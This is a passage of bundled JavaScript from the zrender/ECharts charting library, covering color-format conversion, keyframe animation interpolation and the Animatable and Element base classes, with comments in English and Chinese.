h = (((parseFloat(hsla[0]) % 360) + 360) % 360) / 360;  // 0 .. 1\n    // NOTE(deanm): According to the CSS spec s/l should only be\n    // percentages, but we don't bother and let float or percentage.\n    var s = parseCssFloat(hsla[1]);\n    var l = parseCssFloat(hsla[2]);\n    var m2 = l <= 0.5 ? l * (s + 1) : l + s - l * s;\n    var m1 = l * 2 - m2;\n\n    rgba = rgba || [];\n    setRgba(rgba,\n        clampCssByte(cssHueToRgb(m1, m2, h + 1 / 3) * 255),\n        clampCssByte(cssHueToRgb(m1, m2, h) * 255),\n        clampCssByte(cssHueToRgb(m1, m2, h - 1 / 3) * 255),\n        1\n    );\n\n    if (hsla.length === 4) {\n        rgba[3] = hsla[3];\n    }\n\n    return rgba;\n}\n\n/**\n * @param {Array.<number>} rgba\n * @return {Array.<number>} hsla\n */\nfunction rgba2hsla(rgba) {\n    if (!rgba) {\n        return;\n    }\n\n    // RGB from 0 to 255\n    var R = rgba[0] / 255;\n    var G = rgba[1] / 255;\n    var B = rgba[2] / 255;\n\n    var vMin = Math.min(R, G, B); // Min. value of RGB\n    var vMax = Math.max(R, G, B); // Max. value of RGB\n    var delta = vMax - vMin; // Delta RGB value\n\n    var L = (vMax + vMin) / 2;\n    var H;\n    var S;\n    // HSL results from 0 to 1\n    if (delta === 0) {\n        H = 0;\n        S = 0;\n    }\n    else {\n        if (L < 0.5) {\n            S = delta / (vMax + vMin);\n        }\n        else {\n            S = delta / (2 - vMax - vMin);\n        }\n\n        var deltaR = (((vMax - R) / 6) + (delta / 2)) / delta;\n        var deltaG = (((vMax - G) / 6) + (delta / 2)) / delta;\n        var deltaB = (((vMax - B) / 6) + (delta / 2)) / delta;\n\n        if (R === vMax) {\n            H = deltaB - deltaG;\n        }\n        else if (G === vMax) {\n            H = (1 / 3) + deltaR - deltaB;\n        }\n        else if (B === vMax) {\n            H = (2 / 3) + deltaG - deltaR;\n        }\n\n        if (H < 0) {\n            H += 1;\n        }\n\n        if (H > 1) {\n            H -= 1;\n        }\n    }\n\n    var hsla = [H * 360, S, L];\n\n    if (rgba[3] != null) {\n        hsla.push(rgba[3]);\n    }\n\n    return hsla;\n}\n\n/**\n * @param {string} color\n * @param {number} level\n * @return {string}\n * @memberOf module:zrender/util/color\n */\nfunction lift(color, level) {\n    var colorArr = parse(color);\n    if (colorArr) {\n        for (var i = 0; i < 3; i++) {\n            if (level < 0) {\n                colorArr[i] = colorArr[i] * (1 - level) | 0;\n            }\n            else {\n                colorArr[i] = ((255 - colorArr[i]) * level + colorArr[i]) | 0;\n            }\n            if (colorArr[i] > 255) {\n                colorArr[i] = 255;\n            }\n            else if (color[i] < 0) {\n                colorArr[i] = 0;\n            }\n        }\n        return stringify(colorArr, colorArr.length === 4 ? 'rgba' : 'rgb');\n    }\n}\n\n/**\n * @param {string} color\n * @return {string}\n * @memberOf module:zrender/util/color\n */\nfunction toHex(color) {\n    var colorArr = parse(color);\n    if (colorArr) {\n        return ((1 << 24) + (colorArr[0] << 16) + (colorArr[1] << 8) + (+colorArr[2])).toString(16).slice(1);\n    }\n}\n\n/**\n * Map value to color. Faster than lerp methods because color is represented by rgba array.\n * @param {number} normalizedValue A float between 0 and 1.\n * @param {Array.<Array.<number>>} colors List of rgba color array\n * @param {Array.<number>} [out] Mapped gba color array\n * @return {Array.<number>} will be null/undefined if input illegal.\n */\nfunction fastLerp(normalizedValue, colors, out) {\n    if (!(colors && colors.length)\n        || !(normalizedValue >= 0 && normalizedValue <= 1)\n    ) {\n        return;\n    }\n\n    out = out || [];\n\n    var value = normalizedValue * (colors.length - 1);\n    var leftIndex = Math.floor(value);\n    var rightIndex = Math.ceil(value);\n    var leftColor = colors[leftIndex];\n    var rightColor = colors[rightIndex];\n    var dv = value - leftIndex;\n    out[0] = clampCssByte(lerpNumber(leftColor[0], rightColor[0], dv));\n    out[1] = clampCssByte(lerpNumber(leftColor[1], rightColor[1], dv));\n    out[2] = clampCssByte(lerpNumber(leftColor[2], rightColor[2], dv));\n    out[3] = clampCssFloat(lerpNumber(leftColor[3], rightColor[3], dv));\n\n    return out;\n}\n\n/**\n * @deprecated\n */\nvar fastMapToColor = fastLerp;\n\n/**\n * @param {number} normalizedValue A float between 0 and 1.\n * @param {Array.<string>} colors Color list.\n * @param {boolean=} fullOutput Default false.\n * @return {(string|Object)} Result color. If fullOutput,\n *                           return {color: ..., leftIndex: ..., rightIndex: ..., value: ...},\n * @memberOf module:zrender/util/color\n */\nfunction lerp$1(normalizedValue, colors, fullOutput) {\n    if (!(colors && colors.length)\n        || !(normalizedValue >= 0 && normalizedValue <= 1)\n    ) {\n        return;\n    }\n\n    var value = normalizedValue * (colors.length - 1);\n    var leftIndex = Math.floor(value);\n    var rightIndex = Math.ceil(value);\n    var leftColor = parse(colors[leftIndex]);\n    var rightColor = parse(colors[rightIndex]);\n    var dv = value - leftIndex;\n\n    var color = stringify(\n        [\n            clampCssByte(lerpNumber(leftColor[0], rightColor[0], dv)),\n            clampCssByte(lerpNumber(leftColor[1], rightColor[1], dv)),\n            clampCssByte(lerpNumber(leftColor[2], rightColor[2], dv)),\n            clampCssFloat(lerpNumber(leftColor[3], rightColor[3], dv))\n        ],\n        'rgba'\n    );\n\n    return fullOutput\n        ? {\n            color: color,\n            leftIndex: leftIndex,\n            rightIndex: rightIndex,\n            value: value\n        }\n        : color;\n}\n\n/**\n * @deprecated\n */\nvar mapToColor = lerp$1;\n\n/**\n * @param {string} color\n * @param {number=} h 0 ~ 360, ignore when null.\n * @param {number=} s 0 ~ 1, ignore when null.\n * @param {number=} l 0 ~ 1, ignore when null.\n * @return {string} Color string in rgba format.\n * @memberOf module:zrender/util/color\n */\nfunction modifyHSL(color, h, s, l) {\n    color = parse(color);\n\n    if (color) {\n        color = rgba2hsla(color);\n        h != null && (color[0] = clampCssAngle(h));\n        s != null && (color[1] = parseCssFloat(s));\n        l != null && (color[2] = parseCssFloat(l));\n\n        return stringify(hsla2rgba(color), 'rgba');\n    }\n}\n\n/**\n * @param {string} color\n * @param {number=} alpha 0 ~ 1\n * @return {string} Color string in rgba format.\n * @memberOf module:zrender/util/color\n */\nfunction modifyAlpha(color, alpha) {\n    color = parse(color);\n\n    if (color && alpha != null) {\n        color[3] = clampCssFloat(alpha);\n        return stringify(color, 'rgba');\n    }\n}\n\n/**\n * @param {Array.<number>} arrColor like [12,33,44,0.4]\n * @param {string} type 'rgba', 'hsva', ...\n * @return {string} Result color. (If input illegal, return undefined).\n */\nfunction stringify(arrColor, type) {\n    if (!arrColor || !arrColor.length) {\n        return;\n    }\n    var colorStr = arrColor[0] + ',' + arrColor[1] + ',' + arrColor[2];\n    if (type === 'rgba' || type === 'hsva' || type === 'hsla') {\n        colorStr += ',' + arrColor[3];\n    }\n    return type + '(' + colorStr + ')';\n}\n\n\nvar color = (Object.freeze || Object)({\n\tparse: parse,\n\tlift: lift,\n\ttoHex: toHex,\n\tfastLerp: fastLerp,\n\tfastMapToColor: fastMapToColor,\n\tlerp: lerp$1,\n\tmapToColor: mapToColor,\n\tmodifyHSL: modifyHSL,\n\tmodifyAlpha: modifyAlpha,\n\tstringify: stringify\n});\n\n/**\n * @module echarts/animation/Animator\n */\n\nvar arraySlice = Array.prototype.slice;\n\nfunction defaultGetter(target, key) {\n    return target[key];\n}\n\nfunction defaultSetter(target, key, value) {\n    target[key] = value;\n}\n\n/**\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} percent\n * @return {number}\n */\nfunction interpolateNumber(p0, p1, percent) {\n    return (p1 - p0) * percent + p0;\n}\n\n/**\n * @param  {string} p0\n * @param  {string} p1\n * @param  {number} percent\n * @return {string}\n */\nfunction interpolateString(p0, p1, percent) {\n    return percent > 0.5 ? p1 : p0;\n}\n\n/**\n * @param  {Array} p0\n * @param  {Array} p1\n * @param  {number} percent\n * @param  {Array} out\n * @param  {number} arrDim\n */\nfunction interpolateArray(p0, p1, percent, out, arrDim) {\n    var len = p0.length;\n    if (arrDim === 1) {\n        for (var i = 0; i < len; i++) {\n            out[i] = interpolateNumber(p0[i], p1[i], percent);\n        }\n    }\n    else {\n        var len2 = len && p0[0].length;\n        for (var i = 0; i < len; i++) {\n            for (var j = 0; j < len2; j++) {\n                out[i][j] = interpolateNumber(\n                    p0[i][j], p1[i][j], percent\n                );\n            }\n        }\n    }\n}\n\n// arr0 is source array, arr1 is target array.\n// Do some preprocess to avoid error happened when interpolating from arr0 to arr1\nfunction fillArr(arr0, arr1, arrDim) {\n    var arr0Len = arr0.length;\n    var arr1Len = arr1.length;\n    if (arr0Len !== arr1Len) {\n        // FIXME Not work for TypedArray\n        var isPreviousLarger = arr0Len > arr1Len;\n        if (isPreviousLarger) {\n            // Cut the previous\n            arr0.length = arr1Len;\n        }\n        else {\n            // Fill the previous\n            for (var i = arr0Len; i < arr1Len; i++) {\n                arr0.push(\n                    arrDim === 1 ? arr1[i] : arraySlice.call(arr1[i])\n                );\n            }\n        }\n    }\n    // Handling NaN value\n    var len2 = arr0[0] && arr0[0].length;\n    for (var i = 0; i < arr0.length; i++) {\n        if (arrDim === 1) {\n            if (isNaN(arr0[i])) {\n                arr0[i] = arr1[i];\n            }\n        }\n        else {\n            for (var j = 0; j < len2; j++) {\n                if (isNaN(arr0[i][j])) {\n                    arr0[i][j] = arr1[i][j];\n                }\n            }\n        }\n    }\n}\n\n/**\n * @param  {Array} arr0\n * @param  {Array} arr1\n * @param  {number} arrDim\n * @return {boolean}\n */\nfunction isArraySame(arr0, arr1, arrDim) {\n    if (arr0 === arr1) {\n        return true;\n    }\n    var len = arr0.length;\n    if (len !== arr1.length) {\n        return false;\n    }\n    if (arrDim === 1) {\n        for (var i = 0; i < len; i++) {\n            if (arr0[i] !== arr1[i]) {\n                return false;\n            }\n        }\n    }\n    else {\n        var len2 = arr0[0].length;\n        for (var i = 0; i < len; i++) {\n            for (var j = 0; j < len2; j++) {\n                if (arr0[i][j] !== arr1[i][j]) {\n                    return false;\n                }\n            }\n        }\n    }\n    return true;\n}\n\n/**\n * Catmull Rom interpolate array\n * @param  {Array} p0\n * @param  {Array} p1\n * @param  {Array} p2\n * @param  {Array} p3\n * @param  {number} t\n * @param  {number} t2\n * @param  {number} t3\n * @param  {Array} out\n * @param  {number} arrDim\n */\nfunction catmullRomInterpolateArray(\n    p0, p1, p2, p3, t, t2, t3, out, arrDim\n) {\n    var len = p0.length;\n    if (arrDim === 1) {\n        for (var i = 0; i < len; i++) {\n            out[i] = catmullRomInterpolate(\n                p0[i], p1[i], p2[i], p3[i], t, t2, t3\n            );\n        }\n    }\n    else {\n        var len2 = p0[0].length;\n        for (var i = 0; i < len; i++) {\n            for (var j = 0; j < len2; j++) {\n                out[i][j] = catmullRomInterpolate(\n                    p0[i][j], p1[i][j], p2[i][j], p3[i][j],\n                    t, t2, t3\n                );\n            }\n        }\n    }\n}\n\n/**\n * Catmull Rom interpolate number\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} p2\n * @param  {number} p3\n * @param  {number} t\n * @param  {number} t2\n * @param  {number} t3\n * @return {number}\n */\nfunction catmullRomInterpolate(p0, p1, p2, p3, t, t2, t3) {\n    var v0 = (p2 - p0) * 0.5;\n    var v1 = (p3 - p1) * 0.5;\n    return (2 * (p1 - p2) + v0 + v1) * t3\n            + (-3 * (p1 - p2) - 2 * v0 - v1) * t2\n            + v0 * t + p1;\n}\n\nfunction cloneValue(value) {\n    if (isArrayLike(value)) {\n        var len = value.length;\n        if (isArrayLike(value[0])) {\n            var ret = [];\n            for (var i = 0; i < len; i++) {\n                ret.push(arraySlice.call(value[i]));\n            }\n            return ret;\n        }\n\n        return arraySlice.call(value);\n    }\n\n    return value;\n}\n\nfunction rgba2String(rgba) {\n    rgba[0] = Math.floor(rgba[0]);\n    rgba[1] = Math.floor(rgba[1]);\n    rgba[2] = Math.floor(rgba[2]);\n\n    return 'rgba(' + rgba.join(',') + ')';\n}\n\nfunction getArrayDim(keyframes) {\n    var lastValue = keyframes[keyframes.length - 1].value;\n    return isArrayLike(lastValue && lastValue[0]) ? 2 : 1;\n}\n\nfunction createTrackClip(animator, easing, oneTrackDone, keyframes, propName, forceAnimate) {\n    var getter = animator._getter;\n    var setter = animator._setter;\n    var useSpline = easing === 'spline';\n\n    var trackLen = keyframes.length;\n    if (!trackLen) {\n        return;\n    }\n    // Guess data type\n    var firstVal = keyframes[0].value;\n    var isValueArray = isArrayLike(firstVal);\n    var isValueColor = false;\n    var isValueString = false;\n\n    // For vertices morphing\n    var arrDim = isValueArray ? getArrayDim(keyframes) : 0;\n\n    var trackMaxTime;\n    // Sort keyframe as ascending\n    keyframes.sort(function (a, b) {\n        return a.time - b.time;\n    });\n\n    trackMaxTime = keyframes[trackLen - 1].time;\n    // Percents of each keyframe\n    var kfPercents = [];\n    // Value of each keyframe\n    var kfValues = [];\n    var prevValue = keyframes[0].value;\n    var isAllValueEqual = true;\n    for (var i = 0; i < trackLen; i++) {\n        kfPercents.push(keyframes[i].time / trackMaxTime);\n        // Assume value is a color when it is a string\n        var value = keyframes[i].value;\n\n        // Check if value is equal, deep check if value is array\n        if (!((isValueArray && isArraySame(value, prevValue, arrDim))\n            || (!isValueArray && value === prevValue))) {\n            isAllValueEqual = false;\n        }\n        prevValue = value;\n\n        // Try converting a string to a color array\n        if (typeof value === 'string') {\n            var colorArray = parse(value);\n            if (colorArray) {\n                value = colorArray;\n                isValueColor = true;\n            }\n            else {\n                isValueString = true;\n            }\n        }\n        kfValues.push(value);\n    }\n    if (!forceAnimate && isAllValueEqual) {\n        return;\n    }\n\n    var lastValue = kfValues[trackLen - 1];\n    // Polyfill array and NaN value\n    for (var i = 0; i < trackLen - 1; i++) {\n        if (isValueArray) {\n            fillArr(kfValues[i], lastValue, arrDim);\n        }\n        else {\n            if (isNaN(kfValues[i]) && !isNaN(lastValue) && !isValueString && !isValueColor) {\n                kfValues[i] = lastValue;\n            }\n        }\n    }\n    isValueArray && fillArr(getter(animator._target, propName), lastValue, arrDim);\n\n    // Cache the key of last frame to speed up when\n    // animation playback is sequency\n    var lastFrame = 0;\n    var lastFramePercent = 0;\n    var start;\n    var w;\n    var p0;\n    var p1;\n    var p2;\n    var p3;\n\n    if (isValueColor) {\n        var rgba = [0, 0, 0, 0];\n    }\n\n    var onframe = function (target, percent) {\n        // Find the range keyframes\n        // kf1-----kf2---------current--------kf3\n        // find kf2 and kf3 and do interpolation\n        var frame;\n        // In the easing function like elasticOut, percent may less than 0\n        if (percent < 0) {\n            frame = 0;\n        }\n        else if (percent < lastFramePercent) {\n            // Start from next key\n            // PENDING start from lastFrame ?\n            start = Math.min(lastFrame + 1, trackLen - 1);\n            for (frame = start; frame >= 0; frame--) {\n                if (kfPercents[frame] <= percent) {\n                    break;\n                }\n            }\n            // PENDING really need to do this ?\n            frame = Math.min(frame, trackLen - 2);\n        }\n        else {\n            for (frame = lastFrame; frame < trackLen; frame++) {\n                if (kfPercents[frame] > percent) {\n                    break;\n                }\n            }\n            frame = Math.min(frame - 1, trackLen - 2);\n        }\n        lastFrame = frame;\n        lastFramePercent = percent;\n\n        var range = (kfPercents[frame + 1] - kfPercents[frame]);\n        if (range === 0) {\n            return;\n        }\n        else {\n            w = (percent - kfPercents[frame]) / range;\n        }\n        if (useSpline) {\n            p1 = kfValues[frame];\n            p0 = kfValues[frame === 0 ? frame : frame - 1];\n            p2 = kfValues[frame > trackLen - 2 ? trackLen - 1 : frame + 1];\n            p3 = kfValues[frame > trackLen - 3 ? trackLen - 1 : frame + 2];\n            if (isValueArray) {\n                catmullRomInterpolateArray(\n                    p0, p1, p2, p3, w, w * w, w * w * w,\n                    getter(target, propName),\n                    arrDim\n                );\n            }\n            else {\n                var value;\n                if (isValueColor) {\n                    value = catmullRomInterpolateArray(\n                        p0, p1, p2, p3, w, w * w, w * w * w,\n                        rgba, 1\n                    );\n                    value = rgba2String(rgba);\n                }\n                else if (isValueString) {\n                    // String is step(0.5)\n                    return interpolateString(p1, p2, w);\n                }\n                else {\n                    value = catmullRomInterpolate(\n                        p0, p1, p2, p3, w, w * w, w * w * w\n                    );\n                }\n                setter(\n                    target,\n                    propName,\n                    value\n                );\n            }\n        }\n        else {\n            if (isValueArray) {\n                interpolateArray(\n                    kfValues[frame], kfValues[frame + 1], w,\n                    getter(target, propName),\n                    arrDim\n                );\n            }\n            else {\n                var value;\n                if (isValueColor) {\n                    interpolateArray(\n                        kfValues[frame], kfValues[frame + 1], w,\n                        rgba, 1\n                    );\n                    value = rgba2String(rgba);\n                }\n                else if (isValueString) {\n                    // String is step(0.5)\n                    return interpolateString(kfValues[frame], kfValues[frame + 1], w);\n                }\n                else {\n                    value = interpolateNumber(kfValues[frame], kfValues[frame + 1], w);\n                }\n                setter(\n                    target,\n                    propName,\n                    value\n                );\n            }\n        }\n    };\n\n    var clip = new Clip({\n        target: animator._target,\n        life: trackMaxTime,\n        loop: animator._loop,\n        delay: animator._delay,\n        onframe: onframe,\n        ondestroy: oneTrackDone\n    });\n\n    if (easing && easing !== 'spline') {\n        clip.easing = easing;\n    }\n\n    return clip;\n}\n\n/**\n * @alias module:zrender/animation/Animator\n * @constructor\n * @param {Object} target\n * @param {boolean} loop\n * @param {Function} getter\n * @param {Function} setter\n */\nvar Animator = function (target, loop, getter, setter) {\n    this._tracks = {};\n    this._target = target;\n\n    this._loop = loop || false;\n\n    this._getter = getter || defaultGetter;\n    this._setter = setter || defaultSetter;\n\n    this._clipCount = 0;\n\n    this._delay = 0;\n\n    this._doneList = [];\n\n    this._onframeList = [];\n\n    this._clipList = [];\n};\n\nAnimator.prototype = {\n    /**\n     * Set Animation keyframe\n     * @param  {number} time 关键帧时间，单位是ms\n     * @param  {Object} props 关键帧的属性值，key-value表示\n     * @return {module:zrender/animation/Animator}\n     */\n    when: function (time /* ms */, props) {\n        var tracks = this._tracks;\n        for (var propName in props) {\n            if (!props.hasOwnProperty(propName)) {\n                continue;\n            }\n\n            if (!tracks[propName]) {\n                tracks[propName] = [];\n                // Invalid value\n                var value = this._getter(this._target, propName);\n                if (value == null) {\n                    // zrLog('Invalid property ' + propName);\n                    continue;\n                }\n                // If time is 0\n                //  Then props is given initialize value\n                // Else\n                //  Initialize value from current prop value\n                if (time !== 0) {\n                    tracks[propName].push({\n                        time: 0,\n                        value: cloneValue(value)\n                    });\n                }\n            }\n            tracks[propName].push({\n                time: time,\n                value: props[propName]\n            });\n        }\n        return this;\n    },\n    /**\n     * 添加动画每一帧的回调函数\n     * @param  {Function} callback\n     * @return {module:zrender/animation/Animator}\n     */\n    during: function (callback) {\n        this._onframeList.push(callback);\n        return this;\n    },\n\n    pause: function () {\n        for (var i = 0; i < this._clipList.length; i++) {\n            this._clipList[i].pause();\n        }\n        this._paused = true;\n    },\n\n    resume: function () {\n        for (var i = 0; i < this._clipList.length; i++) {\n            this._clipList[i].resume();\n        }\n        this._paused = false;\n    },\n\n    isPaused: function () {\n        return !!this._paused;\n    },\n\n    _doneCallback: function () {\n        // Clear all tracks\n        this._tracks = {};\n        // Clear all clips\n        this._clipList.length = 0;\n\n        var doneList = this._doneList;\n        var len = doneList.length;\n        for (var i = 0; i < len; i++) {\n            doneList[i].call(this);\n        }\n    },\n    /**\n     * Start the animation\n     * @param  {string|Function} [easing]\n     *         动画缓动函数，详见{@link module:zrender/animation/easing}\n     * @param  {boolean} forceAnimate\n     * @return {module:zrender/animation/Animator}\n     */\n    start: function (easing, forceAnimate) {\n\n        var self = this;\n        var clipCount = 0;\n\n        var oneTrackDone = function () {\n            clipCount--;\n            if (!clipCount) {\n                self._doneCallback();\n            }\n        };\n\n        var lastClip;\n        for (var propName in this._tracks) {\n            if (!this._tracks.hasOwnProperty(propName)) {\n                continue;\n            }\n            var clip = createTrackClip(\n                this, easing, oneTrackDone,\n                this._tracks[propName], propName, forceAnimate\n            );\n            if (clip) {\n                this._clipList.push(clip);\n                clipCount++;\n\n                // If start after added to animation\n                if (this.animation) {\n                    this.animation.addClip(clip);\n                }\n\n                lastClip = clip;\n            }\n        }\n\n        // Add during callback on the last clip\n        if (lastClip) {\n            var oldOnFrame = lastClip.onframe;\n            lastClip.onframe = function (target, percent) {\n                oldOnFrame(target, percent);\n\n                for (var i = 0; i < self._onframeList.length; i++) {\n                    self._onframeList[i](target, percent);\n                }\n            };\n        }\n\n        // This optimization will help the case that in the upper application\n        // the view may be refreshed frequently, where animation will be\n        // called repeatly but nothing changed.\n        if (!clipCount) {\n            this._doneCallback();\n        }\n        return this;\n    },\n    /**\n     * Stop animation\n     * @param {boolean} forwardToLast If move to last frame before stop\n     */\n    stop: function (forwardToLast) {\n        var clipList = this._clipList;\n        var animation = this.animation;\n        for (var i = 0; i < clipList.length; i++) {\n            var clip = clipList[i];\n            if (forwardToLast) {\n                // Move to last frame before stop\n                clip.onframe(this._target, 1);\n            }\n            animation && animation.removeClip(clip);\n        }\n        clipList.length = 0;\n    },\n    /**\n     * Set when animation delay starts\n     * @param  {number} time 单位ms\n     * @return {module:zrender/animation/Animator}\n     */\n    delay: function (time) {\n        this._delay = time;\n        return this;\n    },\n    /**\n     * Add callback for animation end\n     * @param  {Function} cb\n     * @return {module:zrender/animation/Animator}\n     */\n    done: function (cb) {\n        if (cb) {\n            this._doneList.push(cb);\n        }\n        return this;\n    },\n\n    /**\n     * @return {Array.<module:zrender/animation/Clip>}\n     */\n    getClips: function () {\n        return this._clipList;\n    }\n};\n\nvar dpr = 1;\n\n// If in browser environment\nif (typeof window !== 'undefined') {\n    dpr = Math.max(window.devicePixelRatio || 1, 1);\n}\n\n/**\n * config默认配置项\n * @exports zrender/config\n * @author Kener (@Kener-林峰, kener.linfeng@gmail.com)\n */\n\n/**\n * Debug log mode:\n * 0: Do nothing, for release.\n * 1: console.error, for debug.\n */\nvar debugMode = 0;\n\n// retina 屏幕优化\nvar devicePixelRatio = dpr;\n\nvar logError = function () {\n};\n\nif (debugMode === 1) {\n    logError = console.error;\n}\n\nvar logError$1 = logError;\n\n/**\n * @alias module:zrender/mixin/Animatable\n * @constructor\n */\nvar Animatable = function () {\n\n    /**\n     * @type {Array.<module:zrender/animation/Animator>}\n     * @readOnly\n     */\n    this.animators = [];\n};\n\nAnimatable.prototype = {\n\n    constructor: Animatable,\n\n    /**\n     * 动画\n     *\n     * @param {string} path The path to fetch value from object, like 'a.b.c'.\n     * @param {boolean} [loop] Whether to loop animation.\n     * @return {module:zrender/animation/Animator}\n     * @example:\n     *     el.animate('style', false)\n     *         .when(1000, {x: 10} )\n     *         .done(function(){ // Animation done })\n     *         .start()\n     */\n    animate: function (path, loop) {\n        var target;\n        var animatingShape = false;\n        var el = this;\n        var zr = this.__zr;\n        if (path) {\n            var pathSplitted = path.split('.');\n            var prop = el;\n            // If animating shape\n            animatingShape = pathSplitted[0] === 'shape';\n            for (var i = 0, l = pathSplitted.length; i < l; i++) {\n                if (!prop) {\n                    continue;\n                }\n                prop = prop[pathSplitted[i]];\n            }\n            if (prop) {\n                target = prop;\n            }\n        }\n        else {\n            target = el;\n        }\n\n        if (!target) {\n            logError$1(\n                'Property \"'\n                + path\n                + '\" is not existed in element '\n                + el.id\n            );\n            return;\n        }\n\n        var animators = el.animators;\n\n        var animator = new Animator(target, loop);\n\n        animator.during(function (target) {\n            el.dirty(animatingShape);\n        })\n        .done(function () {\n            // FIXME Animator will not be removed if use `Animator#stop` to stop animation\n            animators.splice(indexOf(animators, animator), 1);\n        });\n\n        animators.push(animator);\n\n        // If animate after added to the zrender\n        if (zr) {\n            zr.animation.addAnimator(animator);\n        }\n\n        return animator;\n    },\n\n    /**\n     * 停止动画\n     * @param {boolean} forwardToLast If move to last frame before stop\n     */\n    stopAnimation: function (forwardToLast) {\n        var animators = this.animators;\n        var len = animators.length;\n        for (var i = 0; i < len; i++) {\n            animators[i].stop(forwardToLast);\n        }\n        animators.length = 0;\n\n        return this;\n    },\n\n    /**\n     * Caution: this method will stop previous animation.\n     * So do not use this method to one element twice before\n     * animation starts, unless you know what you are doing.\n     * @param {Object} target\n     * @param {number} [time=500] Time in ms\n     * @param {string} [easing='linear']\n     * @param {number} [delay=0]\n     * @param {Function} [callback]\n     * @param {Function} [forceAnimate] Prevent stop animation and callback\n     *        immediently when target values are the same as current values.\n     *\n     * @example\n     *  // Animate position\n     *  el.animateTo({\n     *      position: [10, 10]\n     *  }, function () { // done })\n     *\n     *  // Animate shape, style and position in 100ms, delayed 100ms, with cubicOut easing\n     *  el.animateTo({\n     *      shape: {\n     *          width: 500\n     *      },\n     *      style: {\n     *          fill: 'red'\n     *      }\n     *      position: [10, 10]\n     *  }, 100, 100, 'cubicOut', function () { // done })\n     */\n    // TODO Return animation key\n    animateTo: function (target, time, delay, easing, callback, forceAnimate) {\n        animateTo(this, target, time, delay, easing, callback, forceAnimate);\n    },\n\n    /**\n     * Animate from the target state to current state.\n     * The params and the return value are the same as `this.animateTo`.\n     */\n    animateFrom: function (target, time, delay, easing, callback, forceAnimate) {\n        animateTo(this, target, time, delay, easing, callback, forceAnimate, true);\n    }\n};\n\nfunction animateTo(animatable, target, time, delay, easing, callback, forceAnimate, reverse) {\n    // animateTo(target, time, easing, callback);\n    if (isString(delay)) {\n        callback = easing;\n        easing = delay;\n        delay = 0;\n    }\n    // animateTo(target, time, delay, callback);\n    else if (isFunction$1(easing)) {\n        callback = easing;\n        easing = 'linear';\n        delay = 0;\n    }\n    // animateTo(target, time, callback);\n    else if (isFunction$1(delay)) {\n        callback = delay;\n        delay = 0;\n    }\n    // animateTo(target, callback)\n    else if (isFunction$1(time)) {\n        callback = time;\n        time = 500;\n    }\n    // animateTo(target)\n    else if (!time) {\n        time = 500;\n    }\n    // Stop all previous animations\n    animatable.stopAnimation();\n    animateToShallow(animatable, '', animatable, target, time, delay, reverse);\n\n    // Animators may be removed immediately after start\n    // if there is nothing to animate\n    var animators = animatable.animators.slice();\n    var count = animators.length;\n    function done() {\n        count--;\n        if (!count) {\n            callback && callback();\n        }\n    }\n\n    // No animators. This should be checked before animators[i].start(),\n    // because 'done' may be executed immediately if no need to animate.\n    if (!count) {\n        callback && callback();\n    }\n    // Start after all animators created\n    // Incase any animator is done immediately when all animation properties are not changed\n    for (var i = 0; i < animators.length; i++) {\n        animators[i]\n            .done(done)\n            .start(easing, forceAnimate);\n    }\n}\n\n/**\n * @param {string} path=''\n * @param {Object} source=animatable\n * @param {Object} target\n * @param {number} [time=500]\n * @param {number} [delay=0]\n * @param {boolean} [reverse] If `true`, animate\n *        from the `target` to current state.\n *\n * @example\n *  // Animate position\n *  el._animateToShallow({\n *      position: [10, 10]\n *  })\n *\n *  // Animate shape, style and position in 100ms, delayed 100ms\n *  el._animateToShallow({\n *      shape: {\n *          width: 500\n *      },\n *      style: {\n *          fill: 'red'\n *      }\n *      position: [10, 10]\n *  }, 100, 100)\n */\nfunction animateToShallow(animatable, path, source, target, time, delay, reverse) {\n    var objShallow = {};\n    var propertyCount = 0;\n    for (var name in target) {\n        if (!target.hasOwnProperty(name)) {\n            continue;\n        }\n\n        if (source[name] != null) {\n            if (isObject$1(target[name]) && !isArrayLike(target[name])) {\n                animateToShallow(\n                    animatable,\n                    path ? path + '.' + name : name,\n                    source[name],\n                    target[name],\n                    time,\n                    delay,\n                    reverse\n                );\n            }\n            else {\n                if (reverse) {\n                    objShallow[name] = source[name];\n                    setAttrByPath(animatable, path, name, target[name]);\n                }\n                else {\n                    objShallow[name] = target[name];\n                }\n                propertyCount++;\n            }\n        }\n        else if (target[name] != null && !reverse) {\n            setAttrByPath(animatable, path, name, target[name]);\n        }\n    }\n\n    if (propertyCount > 0) {\n        animatable.animate(path, false)\n            .when(time == null ? 500 : time, objShallow)\n            .delay(delay || 0);\n    }\n}\n\nfunction setAttrByPath(el, path, name, value) {\n    // Attr directly if not has property\n    // FIXME, if some property not needed for element ?\n    if (!path) {\n        el.attr(name, value);\n    }\n    else {\n        // Only support set shape or style\n        var props = {};\n        props[path] = {};\n        props[path][name] = value;\n        el.attr(props);\n    }\n}\n\n/**\n * @alias module:zrender/Element\n * @constructor\n * @extends {module:zrender/mixin/Animatable}\n * @extends {module:zrender/mixin/Transformable}\n * @extends {module:zrender/mixin/Eventful}\n */\nvar Element = function (opts) { // jshint ignore:line\n\n    Transformable.call(this, opts);\n    Eventful.call(this, opts);\n    Animatable.call(this, opts);\n\n    /**\n     * 画布元素ID\n     * @type {string}\n     */\n    this.id = opts.id || guid();\n};\n\nElement.prototype = {\n\n    /**\n     * 元素类型\n     * Element type\n     * @type {string}\n     */\n    type: 'element',\n\n    /**\n     * 元素名字\n     * Element name\n     * @type {string}\n     */\n    name: '',\n\n    /**\n     * ZRender 实例对象，会在 element 添加到 zrender 实例中后自动赋值\n     * ZRender instance will be assigned when element is associated with zrender\n     * @name module:/zrender/Element#__zr\n     * @type {module:zrender/ZRender}\n     */\n    __zr: null,\n\n    /**\n     * 图形是否忽略，为true时忽略图形的绘制以及事件触发\n     * If ignore drawing and events of the element object\n     * @name module:/zrender/Element#ignore\n     * @type {boolean}\n     * @default false\n     */\n    ignore: false,\n\n    /**\n     * 用于裁剪的路径(shape)，所有 Group 内的路径在绘制时都会被这个路径裁剪\n     * 该路径会继承被裁减对象的变换\n     * @type {module:zrender/graphic/Path}\n     * @see http://www.w3.org/TR/2dcontext/#clipping-region\n     * @readOnly\n     */\n    clipPath: null,\n\n    /**\n     * 是否是 Group\n     * @type {boolean}\n     */\n    isGroup: false,\n\n    /**\n     * Drift element\n     * @param  {number} dx dx on the global space\n     * @param  {number} dy dy on the global space\n     */\n    drift: function (dx, dy) {\n        switch (this.draggable) {\n            case 'horizontal':\n                dy = 0;\n                break;\n            case 'vertical':\n                dx = 0;\n                break;\n        }\n\n        var m = this.transform;\n        if (!m) {\n            m 